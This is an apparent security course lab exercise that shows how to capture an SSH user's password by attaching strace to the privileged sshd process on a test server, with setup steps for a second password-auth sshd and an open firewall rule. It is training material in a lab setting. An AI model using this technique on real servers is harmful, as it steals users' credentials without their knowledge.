H 131: Stealing an SSH Password with strace (10 pts)

What You Need for this Project

Two Linux machines--I used two Google Cloud Debian 10 servers

Purpose

To see how to steal passwords from a ssh server.

I learned this technique from the Cyber June'Gle Virtual Training Summit --ty @texas_cyber @VillageRedTeam @randoriattack.

Adjusting the Google Cloud Firewall

On the left side of the Google Cloud Platform page, click the three-bar "hamburger" icon. Click "Compute Engine", "VM instances".

In the "VM instances" page, on your Debian instance's line, on the right side, click the three-dot icon and click "View network details".

On the left side, click Firewall.

At the top center, click "CREATE FIREWALL RULE".

Enter these values, as shown below.

Name: ssh2222
Targets: All instances on the network
Source filter: IP ranges
Source IP ranges: 0.0.0.0/0
Protocols and ports: Specified protocols and ports
tcp: 2222

At the bottom, click the CREATE button.

Creating a Test User

On your Linux server, in an SSH session, execute this command:

sudo adduser waldo

Give the user a password you can remember, and press Enter enough times to complete the process, as shown below.

Installing strace

On your Linux server, in an SSH session, execute these commands:

sudo apt update sudo apt install strace -y

Launching a Second SSH Server

On your Linux server, in an SSH session, execute these commands:

cd sudo cp /etc/ssh/sshd_config sshd_config sudo chmod 777 sshd_config nano sshd_config

Make sure these lines appear uncommented, as shown below.

PubkeyAuthentication no
PasswordAuthentication yes

Note: this is risky, don't do it on a production server

Press Ctrl+X, Y, Enter to save the file. On your Linux server, in an SSH session, execute these commands:

sudo /usr/sbin/sshd -f sshd_config -p 2222 & sudo ss -ntlp

An sshd process is listening on port 2222, as shown below.

Logging In

From another system, such as a second Google Cloud Debian server, execute this command, replacing the IP address with the public address of your server running sslh:

ssh waldo@35.188.199.249 -p 2222

If you get a warning that the fingerprint is not recognized, enter yes, as shown below.

When it asks for a password, don't answer yet.

Finding the Correct Process

On your Linux server, in an SSH session, execute this command:

sudo ps aux | grep ssh

Find the process labelled waldo [priv], as shown below. Note the process ID in the second column in that row, outlined in the image below.

Execute this command, changing the process ID to the correct value:

sudo strace -p 23927 2> foo

Entering the Password

On your second Linux server, enter Waldo's password to log in. Then enter this command to log out:

exit

Flag H 131.1: Stolen Password (10 pts)
On the ssh server, execute this command to see the stolen password, which appears in the fourth line:
head foo
The flag is covered by a green rectangle in the image below.

References

Spying on ssh password using strace

Posted 6-27-2020